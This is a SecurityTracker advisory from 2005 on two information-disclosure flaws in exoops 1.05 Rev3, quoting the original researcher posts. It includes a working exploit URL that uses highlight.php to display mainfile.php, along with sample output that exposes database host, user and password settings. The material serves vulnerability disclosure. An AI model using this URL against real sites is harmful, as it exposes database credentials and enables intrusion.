Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
exoops Discloses Installation Path and Database Password to Remote Users
|
|
SecurityTracker Alert ID: 1013485 |
|
SecurityTracker URL: http://securitytracker.com/id/1013485
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 21 2005
|
Impact:
Disclosure of authentication information, Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 1.05 Rev3
|
Description:
Majid NT from Iran Hackers Sabotage Team reported two vulnerabilities in exoops. A remote user can determine the database password and the installation path.
A remote user can supply an invalid address to the convertorderbytrans() function in 'viewcat.php' to trigger an SQL error and cause the system to disclose the installation path. This can be exploited via the MyDownloads or MyLinks modules.
A remote user can invoke 'highlight.php' to determine the database connection information, including the password.
A demonstration exploit URL is provided:
http://[target]/Exoops/class/debug/highlight.php?
file=c:\phpdev\www\Exoops\mainfile.php&line=151#151
This will cause the system to display the database name, the database host, the database username, and the database password.
The original advisories are available at:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=10
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=16
|
Impact:
A remote user can determine the database connection information, including the name, username, hostname, and password.
A remote user can determine the installation path.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.exoops.info/ (Links to External Site)
|
Cause:
Access control error
|
Underlying OS:
Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 18 Mar 2005 10:11:59 -0500
Subject: exoops installation path
|
********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT NT@ihsteam.com
********************************************
I Would Change A Default Value In Exoops,By Change A value In
Viewcat.php I Get An Error On It Show Exoops Installation Path.
Tested In Exoops 1.05 Rev3
-------------------------------------------
Going To Exoops And MyDownloads OR MyLinks Module In MainMenu.
Select A Category .In Defaul All List In All Category Sorted By Title
For Get Path You must
Put An Wrong Address For convertorderbytrans Function In Viewcat.php
After That mysql.php [ mysql_fetch_row() ] Make A
Error And Get To You Exoops Installation Address.
------------------------------------------
More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12
Source Advisory:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=10
Found By NT(IHS)
NT@IHSTeam.com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com
--
www.IHSTEAM.com
www.IHSSECURITY.com
-----
********************************************
IHS Iran Hackers Sabotage Public advisory
by : NT NT@ihsteam.com
********************************************
If You Have Exoops Installation Address You Can Use highligh.php Hole
And Get DataBase Configuration(Name,User,Password)
Tested In Exoops 1.05 Rev3
-------------------------------------------
Input This Line To Your Browser AddressBar :
http://targetsite/Exoopsinstalation/class/debug/highlight.php?
file=Exoopsinstallationpath\mainfile.php&line=151#151
Like This :
http://localhost/Exoops/class/debug/highlight.php?
file=c:\phpdev\www\Exoops\mainfile.php&line=151#151
You See This Result :
1 <?php
2 // -------------------------------------------------------------------
------ //
3 // E-Xoops: Content Management for the
Masses //
4 // < http://www.e-xoops.com
>> //
5 // -------------------------------------------------------------------
------ //
6
7 if ( !defined('XOOPS_MAINFILE_INCLUDED') ) {
8 define('XOOPS_MAINFILE_INCLUDED', 1);
9
10 // Physical Path
11 // Physical path to your main E-Xoops directory WITHOUT trailing
slash. ( On windows use simple forward slashes & be sure to include the
drive letter. c:/myfolder )
12 define('XOOPS_ROOT_PATH', 'c:/phpdev/www/exoops');
13
14 // Virtual Path (URL)
15 // Virtual path to your main E-Xoops directory WITHOUT trailing
slash. ( http://www.mysite.com/myfolder )
16 define('XOOPS_URL', 'http://localhost/exoops');
17
18 // Database
19 // Choose the type of database to be used.
20 $xoopsConfig['database'] = 'mysql';
21
22 // Table Prefix
23 // This prefix will be added to all new tables created to avoid
name conflict in the database. If you are unsure, just use the
default 'e_xoops'.
24 $xoopsConfig['prefix'] = 'e_xoops';
25
26 // Database Hostname
27 // Hostname of the database server. ( If you are
unsure, 'localhost' works in most cases. )
28 $xoopsConfig['dbhost'] = 'localhost';
29
30 // Database Username
31 // Your database user account on the host. ( Often root when
installed on your local machine. )
32 $xoopsConfig['dbuname'] = 'root';
33
34 // Database Password
35 // Password for your database user account.
36 $xoopsConfig['dbpass'] = '';
37
38 // Database Name
39 // The name of database on the host. The installer will attempt
to create the database if not exist.
40 $xoopsConfig['dbname'] = 'exoops';
41
42 // Use persistent connection? (Yes=1 No=0)
43 // Default is 'No'. Choose 'No' if you are unsure.
44 $xoopsConfig['db_pconnect'] = 0;
45
46 // Default setup language.
47 $xoopsConfig['default_language'] = 'english';
48
49 include_once(XOOPS_ROOT_PATH.'/include/common.php');
50 }
?>
------------------------------------------
More Information See:
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=12
Source Advisory :
http://www.ihsteam.com/cms/modules/mydownloads/visit.php?lid=16
Found By NT(IHS)
NT@IHSTeam.com
Greet To Lord And C0d3r From IHS.
www.IHSTeam.com
-- www.IHSTEAM.com www.IHSSECURITY.com
|
|
Go to the Top of This SecurityTracker Archive Page
|
